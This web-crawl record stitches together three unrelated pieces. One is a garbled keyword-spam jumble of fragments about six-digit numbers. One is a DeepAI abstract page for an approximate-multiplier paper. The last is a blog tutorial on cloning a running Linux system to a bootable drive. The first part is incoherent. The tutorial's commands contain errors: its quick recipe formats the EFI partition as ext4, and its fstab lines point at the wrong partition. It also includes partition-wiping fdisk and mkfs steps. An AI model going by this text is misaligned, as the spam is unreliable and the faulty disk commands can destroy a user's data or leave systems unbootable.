debtor about who’s entitled to receive the payment, I immediately know that Art. The number six symbolizes beauty and harmony and is often called “the love number”. An IP PIN is a six-digit number assigned to eligible taxpayers that helps prevent the misuse of their Social Security number on fraudulent federal income tax returns. In this video, we will multiply 8085 times 9. 163 1st Grade Math Worksheets. When the math game starts you will see the visitors score on the screen. The image is resized to a 28 by 28 pixel array. To round 365 to the nearest ten Find the. What I tried: first digit can't be a zero, so the number would hav Stack Exchange Network Stack Exchange network consists of 176 Q&A communities including Stack Overflow , the largest, most trusted online community for developers to learn, share their knowledge, and build their careers. US Customary - Metric. Connect to technician. the 5-digit number is your e-filing PIN. The rest are available for new cars. Worksheets > Math > Grade 4 > Place value & rounding > Missing place value (6-digits). If the digit is five or more, you round up. The problem here is that having 4 digit numbers leads to all sorts of problems with zeroes (0001 == 1), out of range errors. Determine the unknown whole number in a multiplication equation (4 x ? = 24). 6 8 ones ones 3. Only word that's a two-digit number backward Thank you for visiting our website! Below you will be able to find the answer to Only word that's a two-digit number backward crossword clue which was last seen on Universal Crossword, March 8 2020. Hence, the numerals such as 0, 1, 2, 3,4, 5,6,7,8,9, and 0 are the form of digits which are used to represent a combination of numbers and do arithmetic operations in our day to day life. Tablet-friendly. Number Plate Frames Black Clear. Ordering Numbers (TU) (Melanie Braithwaite) DOC. PREMIUM accounts can use a random student selector in Number of the Day. 1 more or 1 less? 1 more or 1 less? Each piece of candy has a number on it. Title: Adding 5 and 6 Digit Numbers Worksheet 1 Author: T. But we have to drop two digits, so they must add up to 9. This is the magic sauce step since doing thresholding manually will have one enter the values one by one. This resource from Mathsframe generates random numbers using 'spinners' with 3, 4, 5 or 6 sides. Enter account PIN for undefined to start watching. Vine-Ripened Heritage. Common Core State Standards: 2. Data is a little light today as investors await tomorrow’s weekly jobless claims. Mozzy, Sauce Twinz - Duration: 5:43. What number am I? 555 333 468 735 or 739 503 198 349 850 99 95 What Number Am I?.  choices for the first digit ´ choices for the second digit ´ choices for the third digit ´ choices for the fourth digit = total number of outcomes   10 ´ 10 ´ 10 ´ 10 = 10,000  There are 10,000 possible outcomes. Print a Customized Sudoku Ebook . In Korea they read the date before the month and year. There are 1,000,000 ways of writing out a six digit number, if you are starting with 000000 and ending with. The units digit of a number is the number to the right of the tens place. Individuals found performing unauthorized activities are subject to disciplinary action including criminal prosecution. Put a cross in the first row and first column or the (1,1) position. Invert image. Subtract the smaller of your two numbers from the larger one. What number am I? 9. Find the number. The first digit of your ATM pin number can be 0, right?. National Drug Codes Explained. 1 more or 1 less? 1 more or 1 less? Each piece of candy has a number on it. A savory classic. Chapter 6 Overview: Multiply by One-Digit Numbers; Teaching Model 6. The restrictions don't hurt too much. United States: 2,367. 6-Digit Number Bingo contains: Colour Counters [PDF] Number Boards [PDF] Number Cards [PDF] Word Boards [PDF] Word Cards [PDF] Word List [PDF]. random 6 digit number Archived. Fontina & Asiago Italian Sauce. Dec 22, 2017 · This works for me. Use the Fundamental Counting Principle. Addition: Level 1: single digit Level 2: double digit, no carrying Level 3: : double digit, with carrying Level 4: 3 digits, no carrying Level 5: 3 digits, with carrying Number of questions:. Bank Routing Numbers There are 8 digits plus a check digit. Forum Member. 8 mg 0 % Sodium 308. Armstrong Numbers Problem Statement. It involves: 1. Suresh Aggarwal 295,879 views. Glossy Number Numbers. ends, and then perform a single right-to-left pass in which the sum is computed digit by digit, maintaining the overow as a carry. Schedule Your FREE Heart Health Screening. 6 digit counter can be used for counting number/length/batch, position control of balers controlled by variable frequency motor, and measuring height, position and angle. can of Budweiser beer. In this video, we will multiply 8085 times 9. multiplying 2 to 4-digit numbers by multiplies of 10 1. The subscript 2 denotes a binary number. For 0-9, it is the same, but A = 10, B = 11, C = 12, D = 13, E = 14, and F = 15. I spy an unfinished math problem. Decimal digits are any of: 0 1 2 3 4 5 6 7 8 9. Sell By Date: Though not required, most egg cartons also contain a “sell by” date beyond which they should not be sold. Angel is thinking of a number. You can of course add limitations Sub numberExtract () x = ActiveCell Dim valIs As String Dim a As String For i = 1 To Len (x) a = Mid (x, i, 1) If IsNumeric (a) Then valIs = valIs & a End If. To make them as small as possible, I'd like to drop 4 and 5; but it could also be 3 and 6, 2 and 7, or 1 and 8. Using Digit-Eyes, inexpensive off-the-shelf office supplies and a standard inkjet or laser printer, you'll be able to record audio labels or make text labels that are read. Chapter 6 Overview: Multiply by One-Digit Numbers; Teaching Model 6. A 10-digit ISBN cannot be converted to 13-digits merely by placing three digits in front of the 10-digit number. To round 365 to the nearest ten Find the. Notice that 521 and 345 have one more digit. In the column A need to count only 6 digit numbers by formula, here duplicate will not come for 6 digit number. In this case we rely on the IBAN check digit for integrity control. Invalid characters include > < ( ) # % { } + ;. x quarts requires 6x tomatoes and 1x cups of oil. (NSW,QLD,VIC,ACT,WA,SA) Number Plate Cover - fits NSW Black and Yellow Number plates Perspex Cover with no lines fitting screws included for one pair Front - 372mm x 134mm Rear - 372 x 134mm Number Plate Advertising Pty Ltd is 100% Australian owned and all covers are manufactured in Australia. If you still want to go ahead with a 5 or 6 digit phone number, since these can be SMS only, your best bet is to buy a Phone KeyWord form another company, so the customer would text your keyword to a 6 digit number that that company are in control of, for example "EEHELP" to 66666, these can cost upwards of £20-£60 ($30-$90) pcm (per calendar. Scotland (CfE) » CfE Curriculum Browser » Numeracy and Mathematics » Second Level » Number, Money and Measure » Number and Number Processes » I have extended the range of whole numbers I can work with and having explored how decimal fractions are constructed, can explain the link between a digit, its place and its value. Each cell contains 3 numbers separated by line break – CHAR(10) and you need to extract the number that is 10 digits long. com is the largest UPC lookup database where you can search a broad range of UPC numbers to find related product information, images, barcodes, online shopping guide and more. Place the final digit after the first two digits of the UPC-E if the final digit is a zero, one or two. This interactive is optimized for your desktop and tablet. Units Digit and Multiplication. The collection includes worksheets, math games, mystery pictures, task cards, and learning center activities. Multiplication mastery is close at hand with these thorough and fun worksheets that cover multiplication facts, whole numbers, fractions, decimals, and word problems. Cylindrical-coordinate representations (also known as HSL) of color #ffff00 hue: 0. A size #6 Griswold skillet, for example, is pattern number "699", a size #7 is pattern "701", and a size #8 is pattern "704". The first digit cannot be zero therefore there are 9 possibilities for this digit. It includes starter activities, whole class teaching, group activities, practice sheets and mastery questions. UPC Lookup Database. Transportation and Warehousing. Sum the results of step three and four: 66. 33-48 of 105 results for "6 digit number stamp" Skip to main search results Amazon Prime. Data is a little light today as investors await tomorrow’s weekly jobless claims. To find the first 3 digit number divisible by 6, we have to divide the very first 3 digit number 100 by 6 100/6 = 16. The Human Brain is capable of storing between 5 and 7 items of data in the short term memory. #N#Level 4: 3 digits, no carrying. 1) What is the largest 5-digit number you can make with the digits? 96,321 2) Subtract 90 from this number. US Customary - Metric. HEINZ Horseradish is the condiment that started it all, and our collection of flavorful specialty sauces has only grown since. 168 of the Code of. Prior to 1973, social security numbers were assigned by our field offices. Fourth grade E. Then, multiply the fourth digit by 3, the fifth digit by 7 and the sixth digit by 1. Explore our vast selection of chunky, meat, mushroom, cheese sauces and more. 0m) Random 2 Digit Number Generator Pick Random Numbers. 1 gram of sugar per 100 gram food). These Division Worksheets produces problems in which you must divide a 3 digit decimal number by a single digit number. Simmer for 30-60 minutes (or not at all depending on your taste and time frame). They are unambigous identifiers for books and other nonperiodic media. Developing Questions to support rounding numbers up to and within 10,000,000 to the nearest 1,000,000. LA Times - Sept. The term digits are preferably used in computer science. a) 6 ÷ ÷ 10 = 3 ÷ 10 b) 24 ÷ 6 ÷ 10 = ÷ 10 c) 42 ÷ ÷ 10 = 21 ÷ 7 ÷ 10 d) Write a problem like this for a partner to solve. because you're basically multiplying XYZ by 1000 and adding to itself to the product. All feedback will be gathered by SMG (i. Make sense of problems and persevere in solving them. - Visit the country pages to access customer care contacts: EMS Global Network › - Track your EMS item › To track your EMS item, please enter your 13 digit item number (e. The VIN is also imprinted on a metal tag located on the left side of the frame above the motor. Find the missing part from a 5-digit number; Find the missing part from a 6-digit number (print in landscape) Find the missing part, up to 8-digit numbers or hundred millions (print in landscape) Write up to a 7-digit number given in expanded form in a normal form; Write up to a 10-digit number given in expanded form in a normal form (print in. In America we would abbreviate that as 9/18/15. , except for Saturday evenings when the drawing is held during the Cash Explosion Game Show which begins at 7:30 p. cup extra virgin olive oil. So to be certain a value is unique, is to check a generate value against all previous generated values. The first two number digits in the serial number identify the year the guitar was created. The GTIN is a globally unique 14-digit number used to identify trade items, products, or services. int isdigit ( int c ); Check if character is decimal digit. Digits 7-23 Vehicle Identification Number (7) VIN. Reviewed on 11 October 2018. This selection will help you to find what the place value is of a particular digit in a number. Then add the individual digits of doubled (odd) numbers and even digits of the original number. What Is a D‑U‑N‑S Number? The Dun & Bradstreet D‑U‑N‑S Number is a unique nine-digit identifier for businesses. MGA of P40,000. So to find the total number of letter combinations we multiply the number of choices for the first digit by the number of choices for the next digit, in this case 26*26, for a total of 676. often appears when someone asks for the sauce. Anime girl noises guy. We apologize for any inconvenience. r/NoStupidQuestions: Ask away! EDIT: I appreciate the replies. Use alpha and/or numeric characters with no spaces or symbols. At this time, the city hasn't given an. its generating repetative numbers which we don't want. Each template includes a range of appropriate number sense skills to help develop competent and confident mathemat. I work nights and sleep during the day so I finally answered the 9935 number and got some heavy indian accented male and in my sleep fogged brain could only understand something about 'softwarehow are you. Australian landline telephone numbers are 8 digit. Place Value of 5 and 6 Digit Numbers Printable Worksheets These Grade 4 Maths resources and worksheets have answers also given in the downloadable links below. When the dates of tracking polls from the same pollster overlap, only the most recent version is shown. Generating random 6 digit numbers. Numbers, such as 495,784, have six digits. Sauce down: MM! Sauce centre?🤔. com, adding5and6digitnumbers1, item 3993. The Product Game is a fun, interactive game that exercises your skill with factors and multiples. Watch our other videos: English Stories for Kids:. Use place value understanding and properties of operations to add and subtract. code 17-Aug-12 5:22am. Place Value (6-Digit Numbers) Welcome to the 6-digit place value page. I need to auto generate a 6-digit non-duplicate unique random number in my Excel 2013 VBA application. EVENT FOCUS 10 10. cup extra virgin olive oil. A rough approximation would be to say the three successive digit rule removes$\frac1{1000}$after the second digit and the three repeated digit rule the same. An Armstrong number of three digits is an integer such that the sum of the cubes of its digits is equal to the number itself. 6 digit counter can be used for counting number/length/batch, position control of balers controlled by variable frequency motor, and measuring height, position and angle. I tried a different algorithm (for the sake of length, I'll only describe it), which is 4 nested for loops which iterates through the thousands, tens ect ect and does the same comparason. SSChasing Mays. In America we would abbreviate that as 9/18/15. Day 1 Teaching Write 457,849. Founded in San Francisco, the ADDL opposed “creeping numeralism” and fought a losing battle to preserve the use of telephone exchange names. Use the Fundamental Counting Principle. Kangaroo Island was all 5 digit numbers until the migration to the current 8 digit numbers. These worksheets are pdf files. The units digit of a number is the number to the right of the tens place. 4 digit or 6 digit numbers? I keep getting calls from either a 4 digit number, 9935 or a 6 digit number, 999902. Use alpha and/or numeric characters with no spaces or symbols. Number of Business Establishments. We do not use the word "thousand", at least not for reading years within the past 1000 years. A quart of Tuscan sauce requires 6 tomatoes and 1 cup of oil. One way to win: match one digit of the four winning numbers in the exact same position. I want to generate Alphanumeric 6 digit coupon number. 6-digit number. A 10-digit ISBN cannot be converted to 13-digits merely by placing three digits in front of the 10-digit number. Locate the 17-digit Vehicle Identification Number (VIN) printed on the frame of your motorcycle. So you'd calculate the answer like this: 10x10x10x10x10x10. 1 more or 1 less? #2. (After your visit, close the MegaPenny Project window to return to Math Cats. There is no specific year of manufacturing data available. 8th Generation Intel® Core™ Processor Family. Kingpin 3/4 Digit Slimline Covers (VIC)$ 34. This also satisfies 6 as well, because it's now divisible by 2 and 3. For example, a guitar with the serial number ICJ1500001 was made in 2015. If you then add the doubled numbers and the remaining eight numbers, I guarantee that the total will be a multiple of 10. You will request assistance from a helper (either a friend or Microsoft Support). In this tutorial, we will show you how you can easily generate 6,8,10 digit random, unique, alphanumeric string in PHP. Multiple worksheets. These are dates to mark events, posts or occasions. 6 Find whole-number quotients of whole numbers with up to four-digit dividends and two-digit divisors, using strategies based on place value, the properties of operations, and/or the relationship between multiplication and division. So for each first digit you can have 0,1,2,3,4,5,6,7,8, or 9. Salt is an important ingredient in the manufacturing of many types of cheese, but we work with cheese makers to give you cheeses with great taste and limited salt wherever possible. To customize the format, just change the formula. 95 Add to cart Details; Kingpin 3/4 Digit Standard Covers (All States) \$ 34. 1963: 1+9+6+3 = 19 1+9 = 10 1+0 = 1. 4 A recipe for Hollandaise sauce * Following an Algorithm Algorithm for preparing a. Get the Answers. It is the only practical way to go ensure numerous unique keys over a long periods of time. The binomial coefficient formula is a. Pesto Marinara Italian Sauce. My Italian card has a 5 digit PIN, so why would a 4-digit PIN be necessary in Italy?. We are unable to determine your location. By Laverna Dossantos. 6-digit number. References Last edited on 22 April 2020, at 18:47. Then add the individual digits of doubled (odd) numbers and even digits of the original number. Chapter 6 Problem Solving and Algorithm Design * Phase Interactions * Pseudocode While ( the quotient is not zero ) Divide the decimal number by the new base Make the remainder the next digit to the left in the answer Replace the original decimal number with the quotient * Following an Algorithm Figure 6. Using number shapes in addition to a 2 digit system is quite useful for things like laws where some §§ or Articles have 3 digits, but there’s no time pressure. Pet owner walks 60km in one day to look for prize-winning dog who went missing in Ajman. So you want a six digit number that doesn't have repeating values in it (382945 is good, 235782 is bad). 4D RESULT February 24 2020. Combining Like Terms (Difficult). Math Cluster. Processor numbers for the 8th Generation Intel® Core™ processors use an alphanumeric scheme based on generation and product line following the brand and its modifier. The calculator determines the underlying or basic meaning. Spice up the bolognese sauce by adding a finely diced fresh chilli pepper or hot chilli sauce or 1/2 to 1 teaspoon of harissa paste or any other little wonder sauce (check the heat is to your taste). Requesting an IP PIN is strictly voluntary. There are two Kaprekar Constants for 6-digit numbers - 631764 and 549945. The repeated pairs is. 6 Divide 2-digit numbers by 1-digit numbers 4T7. Each Sudoku has a unique solution that can be reached logically without guessing. In America we would abbreviate that as 9/18/15. and affiliated banks, Members FDIC and wholly owned subsidiaries of Bank of America Corporation. and here are the numbers on the pots: Vol Control:13772. Convert 6 digit number to 3 separate Hex numbers Welcome › Forums › General PowerShell Q&A › Convert 6 digit number to 3 separate Hex numbers This topic has 0 replies, 1 voice, and was last updated 8 years, 3 months ago by Forums Archives. 47 1969-1984 Tenryu/Wada Factory Made in Japan Serial Number: 690301 1969, March 6903 Unit Number Month, March Year, 1969 System # A8 1985-1986 Tenryu/Wada Factory Made in Japan Serial Number: 850001 5000 Unit Number Year, 1985 1985. 2285 Sacramento Campus 3200 Fifth Avenue, Sacramento, California 95817. It's widely known that the 8 digit serial numbers start with the year as the first number. 123456, 234567, 345678, 456789, 567012, 654321, 765432, 876543, 987654 In each prediction only one digit is placed correctly. method (2) counting: LOOK AT THE TREE DIAGRAM ABOVE. Share a link to this answer.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2195180505514145, "perplexity": 1504.9137065866348}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657138718.61/warc/CC-MAIN-20200712113546-20200712143546-00296.warc.gz"}
https://deepai.org/publication/amr-mul-an-approximate-maximally-redundant-signed-digit-multiplier
DeepAI # AMR-MUL: An Approximate Maximally Redundant Signed Digit Multiplier In this paper, we present an energy-efficient, yet high-speed approximate maximally redundant signed digit (MRSD) multiplier (called AMR-MUL) based on a parallel structure. For the reduction stage, we suggest several approximate Full-Adder (FA) reduction cells with average positive and negative errors obtained by simplifying the structure of an exact FA cell. The optimum selection of these cells for each partial product reduction stage provides the lowest possible error, turning this task into a design space exploration problem. We also provide a branch-and-bound design space exploration algorithm to find the optimal assignment of reduction cells based on a predefined constraint (i.e., the width of the approximate part) by the user. The effectiveness of the proposed (Radix-16) multiplier design is assessed under different digit counts and approximate border column. The results show that the energy consumption of the MRSD multiplier is reduced by 7x at the cost of a 1.6 • 1 publication • 5 publications • 5 publications • 35 publications 07/25/2022 ### Energy-efficient DNN Inference on Approximate Accelerators Through Formal Property Exploration Deep Neural Networks (DNNs) are being heavily utilized in modern applica... 07/20/2021 ### Positive/Negative Approximate Multipliers for DNN Accelerators Recent Deep Neural Networks (DNNs) managed to deliver superhuman accurac... 07/25/2021 ### Ultra-Fast, High-Performance 8x8 Approximate Multipliers by a New Multicolumn 3,3:2 Inexact Compressor and its Derivatives Multiplier, as a key role in many different applications, is a time-cons... 07/04/2019 ### Low-power and Reliable Solid-state Drive with Inverted Limited Weight Coding In this work, we propose a novel coding scheme which based on the charac... 02/12/2018 ### Quasi-Optimal Partial Order Reduction A dynamic partial order reduction (DPOR) algorithm is optimal when it al... 10/24/2017 ### Approximate Reduction of Finite Automata for High-Speed Network Intrusion Detection We consider the problem of approximate reduction of non-deterministic au... 10/24/2017 ### Approximate Reduction of Finite Automata for High-Speed Network Intrusion Detection (Technical Report) We consider the problem of approximate reduction of non-deterministic au...
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8939505219459534, "perplexity": 3272.615593184207}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446708046.99/warc/CC-MAIN-20221126180719-20221126210719-00612.warc.gz"}
https://looseassociations.com/?p=189
# Making Linux Bootable Clones A bootable clone is a disk that holds a complete copy of a running system that’s ready to boot. Bootable clones can be a critical part of your backup strategy. # Why Bootable Clones If you’re truly hardcore, and just want a command reference so you don’t leave out any steps, skip to the expert mode recipe. If you have mission critical computers in your life, I hope you are already aware of the importance of good backups. I’ve noticed, though, that a lot of people think that just having copies of all their files is enough. They’ll set up, say, an automated cloud backup — and figure they’re done. They’re probably in for a nasty surprise if disaster hits. A lot of the information in your computer isn’t in the files, but in various nebulous kinds of metadata: where the files are located, various configuration files, license keys, special directories, file links, permissions… Just restoring all your files isn’t enough if you want to be back online as fast as possible. My primary laptop is a macOS machine. I’ve long employed SuperDuper and Carbon Copy Cloner to make bootable clones. If my laptop gets destroyed, lost, or stolen, all I have to do is plug a clone into any recent-vintage Macintosh, reboot, and I’m back in production. I don’t even have to wait for files to copy. By contrast, last year I tried a scratch restore from a Time Machine backup, and it took almost two days to get reasonable working system, and several weeks after that before most of the little glitches were smoothed out. In fairness, my setup is a lot more complicated than the average user, but I also get the sense that most users are largely unaware of how tied they are to complicated configurations that they’ve (consciously or otherwise) fine-tuned to their workflow over the course of years. I also maintain a hundred or so Linux-based systems. I’ve searched from time to time, but surprisingly I’ve never found a SuperDuper-like utility for making bootable clones. It’s long been on my list of things to create, but a recent systemd-related disaster left me with a crashed mission-critical server for over five days. That, combined with a horrible bug in the duplicity backup system, resulted in more downtime than all of my systems combined over the previous ten years. # Current Options • Clonezilla isn’t a bad option. It will create a sector-by-sector clone onto a new hard drive. It is file-system agnostic so your copy is almost guaranteed to work as well as the original. Optionally, you can put your clones into image files. They won’t boot, but can be restored to then-bootable media. However: • Clonezilla requires that you boot from a live CD to make your backups. That means that your system is unusable during the hours that it can take to make the backup (not acceptable for mission-critical servers). • Clonezilla requires that the system have a working optical drive. • When using Clonezilla, you’re pretty much stuck with working from the console (or spending time configuring ssh). In my world, that means a certain amount of physical discomfort. I much prefer the comfort of working from my mother’s basement, chugging Mountain Dew while my Dorito-dust covered fingers clack away on my sticky gaming keyboard. • Clonezilla requires that the destination disk be as large or larger than the source. I once tried to make a clone of a 2 terabyte server disk to an “identical” 2 TB disk. For whatever reason (I didn’t investigate, possibly some defective sectors), the destination drive was a few blocks smaller than the source disk. After many hours of copying, the backup failed. • Filesystem copies using cp, tar, or rsync can make sure that you get all your files. The usual advice is then “install a fresh system, and copy the important files from your backup to the new bootable system.” Guess what: it won’t work. Yes, you can copy your /home directory, but that won’t restore any of your system configuration. Over time, you’ve probably installed multiple software packages with multiple configuration files, perl and python modules, all scattered through the /etc and /var directories and configuration files, thoroughly mixed in with install-specific files and data that you can’t just replace with information from the old system. You’ll lose log files. You’ll lose startup sequences. Unless you run a vanilla system (and I doubt any plain-vanilla users are here reading this) you’ll be in for hours and hours of reconfiguration and figuring out which “important” files should be copied, and which must not be, and which configuration files need to be carefully merged with those on the new system. • dd. I use and love dd, and it meets my criterion for simplicity, but it has some real limitations. • The destination drive has to be as large or larger than the source drive. • It isn’t smart about what it copies. I have a server with a 1.5TB drive, but it’s only using 86GB (only a fraction of which changes between backups). When using dd, I pretty much have to copy the entire 1.5TB which takes hours. Yes, I could re-partition the drive and only dd the partition but then the clone wouldn’t be bootable and I’d lose the simplicity. • It doesn’t do incremental backup. # Simplicity is Key People get cagey about backups. They want to be selective (who needs to be able to access three years of temporary cache files?). They want to conserve backup space. That’s all well and good, but your bootable clone is not the place to do this. Just buy a backup drive that’s as large or larger than your primary and back up everything. You don’t want to be scrambling to get back online and discover that a rule you created to save a few MB of drive space inadvertently blocked the backup of a critical file. # Creating a Bootable Clone This technique has been tested with Ubuntu 14.04, Ubuntu 18.04, Devuan ascii, as well as recent Arch releases. It should work with Debian-derived distros and other systems that use the GRUB2 bootloader. • plug in backup drive • open a bash shell; you need to be root so… sudo -s • next, figure out which drive you’re working with fdisk -l • and identify which drive is the backup drive; we’re going to assume its /dev/sdx. So remember: whenever you see /dev/sdx, be sure to replace the x with the appropriate device indicator. ## First Time? Prepare the Bare Drive WARNING! This will erase all data on whatever drive you specify. Specify the wrong drive, and you’ll erase your source instead of your destination. Be careful! • If you already have a bootable clone, skip the next three steps and you’ll just incrementally update your clone. • The next three steps initialize a bare drive for first-time cloning. Whatever device you specify *will be erased,* so make sure you’re erasing the disk you think you are. Remember to change /dev/sdx to your actual device designation. You might have to repeat the “d” command several times if there are multiple existing partitions. When in doubt, use defaults. fdisk /dev/sdx • here’s what your fdisk session should look like — though you will have to display the list of partition types and use the version-specific code for the EFI and swap partitions: Welcome to fdisk (util-linux 2.29.2). Changes will remain in memory only, until you decide to write them. Be careful before using the write command. Command (m for help): d Partition number (1-3, default 3): Partition 3 has been deleted. [repeat until you get an error because all the partitions have been deleted] Command (m for help): n Partition type p primary (0 primary, 0 extended, 4 free) e extended (container for logical partitions) Select (default p): Using default response p. Partition number (1-4, default 1): First sector (2048-468862127, default 2048): Last sector, +sectors or +size{K,M,G,T,P} (2048-468862127, default 468862127): +512M Created a new partition 1 of type 'Linux' and of size 512 MiB. Command (m for help): t Selected partition 1 Partition type (type L to list all types): XX Changed type of partition 'Linux' to 'EFI (FAT-12/16/32)'. Command (m for help): n Partition type p primary (1 primary, 0 extended, 3 free) e extended (container for logical partitions) Select (default p): Using default response p. Partition number (2-4, default 2): First sector (1050624-468862127, default 1050624): Last sector, +sectors or +size{K,M,G,T,P} (1050624-468862127, default 468862127): +213G [subtract the desired swap size from the total disk size; this was a 223GB disk as reported by fdisk, and I want about a 10GB swap] Created a new partition 2 of type 'Linux' and of size 213 GiB. Command (m for help): n Partition type p primary (2 primary, 0 extended, 2 free) e extended (container for logical partitions) Select (default p): Using default response p. Partition number (3,4, default 3): First sector (447744000-468862127, default 447744000): Last sector, +sectors or +size{K,M,G,T,P} (447744000-468862127, default 468862127): Created a new partition 3 of type 'Linux' and of size 10.1 GiB. Command (m for help): t Partition number (1-3, default 3): Partition type (type L to list all types): XX Changed type of partition 'Linux' to 'Linux swap'. Command (m for help): w The partition table has been altered. Calling ioctl() to re-read partition table. Syncing disks. • Format the UEFI partition. You might need to install dosfstools (eg. apt install dosfstools) to create the FAT partition. mkfs.fat -F32 /dev/sdx1 • Create the file system. Remember to edit /dev/sdx2 appropriately. mkfs.ext4 /dev/sdx2 • Set up the swap partition. mkswap /dev/sdx3 • Mount the file system. Remember to edit /dev/sdx2 first. mount -t ext4 /dev/sdx2 /mnt • Create some special directories. mkdir /mnt/dev mkdir /mnt/dev/pts mkdir /mnt/sys mkdir /mnt/proc ### Mount and Copy • Mount the clone you’re updating. Skip this command if you’re starting from scratch, as you’ve already mounted the new drive. mount -t ext4 /dev/sdx2 /mnt • Because we’re using rsync, if a clone already exists on this drive, it will incrementally update which should save some time. rsync --archive --verbose --delete --exclude=/dev --exclude=/sys --exclude=/proc --exclude=/mnt -xx / /mnt ### Install GRUB2 • Now you have the files copied, but you have to install a bootloader to make the drive bootable. To do this, we’ll chroot to the clone disk after making some special system directories available there. mount --bind /dev /mnt/dev mount --bind /dev/pts /mnt/dev/pts mount --bind /sys /mnt/sys mount --bind /proc /mnt/proc mkdir /mnt/boot/efi mount /dev/sdx1 /mnt/boot/efi chroot /mnt • Install the bootloader. Remember that you have to fix up /dev/sdx in two places before executing these commands. grub-install /dev/sdx grub-install --recheck /dev/sdx update-grub ### Clean up /etc/fstab • This is a trickier part of the process. Systems are likely to be configured to use other disk partitions for /boot or /home or for swap space. In order to keep things clean and simple, I’ve made the clone into a monolithic file system. Unfortunately, the cloned /etc/fstab might cause the system to fail to boot. These commands attempt to create an fstab that’s good enough to boot. (Swap might be important to you; see the note at the end of this article for information on re-enabling swap on a clone.) • First, back up the existing fstab. mv /etc/fstab /etc/fstab.bak • In this command, look out for the buried /dev/sdx2 that needs to be edited! echo -e "UUID=lsblk -no UUID /dev/sdx1\t/\text4\tdefaults,noatime\t0\t1" >/etc/fstab ### Clean Up and Reboot • Your clone is complete, but lets clean up a bit. exit umount /mnt/boot/efi /mnt/dev/pts /mnt/dev /mnt/sys /mnt/proc /mnt • When you want to test your clone (and you do!), you’ll have to abandon the comfort, safety, and copy/paste convenience of your remote shell and work from the console, as you have to modify boot parameters • During the boot process, press del or esc or F11 or F12 or whatever key allows you to change the BIOS or EFI boot device, and change it to the newly created disk # Expert Mode • Here’s the whole cloning recipe without the commentary. Remember that it won’t work (and can be dangerous!) without editing, but hardcore folks can put this in a window next to their terminal for copypaste profit. sudo -s fdisk -l fdisk /dev/sdx ### fixup mkfs.fat -F32 /dev/sdx1 ### fixup mkfs.ext4 /dev/sdx1 ### fixup mkswap /dev/sdx3 ### fixup mount -t ext4 /dev/sdx2 /mnt ### fixup mkdir /mnt/dev mkdir /mnt/dev/pts mkdir /mnt/sys mkdir /mnt/proc rsync --archive --verbose --delete --exclude=/dev --exclude=/sys --exclude=/proc --exclude=/mnt -xx / /mnt mount --bind /dev /mnt/dev mount --bind /dev/pts /mnt/dev/pts mount --bind /sys /mnt/sys mount --bind /proc /mnt/proc chroot /mnt mkdir /boot/efi mount /dev/sdx1 /boot/efi/ ### fixup grub-install /dev/sdx ### fixup grub-install --recheck /dev/sdx ### fixup update-grub mv /etc/fstab /etc/fstab.bak echo -e "UUID=lsblk -no UUID /dev/sdx1\t/\text4\tdefaults,noatime\t0\t1" >/etc/fstab ### fixup required exit umount /mnt/boot/efi /mnt/dev/pts /mnt/dev /mnt/sys /mnt/proc /mnt # After Words Remember that the “disaster” in “disaster recovery” can mean many things, from acts of nature to government seizures to theft or sabotage or facility breakdown. I keep two bootable clones of each machine and, each week, I swap them between two geographically-separate sites. That way, I always have a bootable clone that’s less than two weeks old even if one location is completely lost. Of course, that’s in addition to much-more-frequent rsync backups between sites and archiving cloud backups. Back up in depth — it’s good for your health. No, I don’t actually juggle 200+ clones. Many of my boxen are very small (think whiteboxed routers). I use a small stack of 2TB portable USB3 drives and create rsync images in separate directories under root. If I need a clone, I can either copy the subdirectory to root on a fresh drive, or just move the subdirectory up to root. I then install GRUB2 and go. Unlike the Apple use case above, using clones to run from different hardware isn’t quite as straightforward. Since the hardware doesn’t come from a corporate monoculture, more differences exist than in the Macintosh ecosystem. Surprisingly, this hasn’t been as big an issue as I expected, in spite of the fact that my infrastructure is built from fire-sale, castoff, and various other forms of junk computers ranging from Mac minis to repurposed doorstops. It is sometimes necessary to tweak /etc/fstab or to change networking parameters to switch from eth0 to eth1 or the like. In order to keep things as simple as possible, I have not enabled swap (though we did reserve a swap partition). Linux systems tend to degrade more gracefully when swap is enabled. The ArchWiki has a good discussion on how to enable swap.
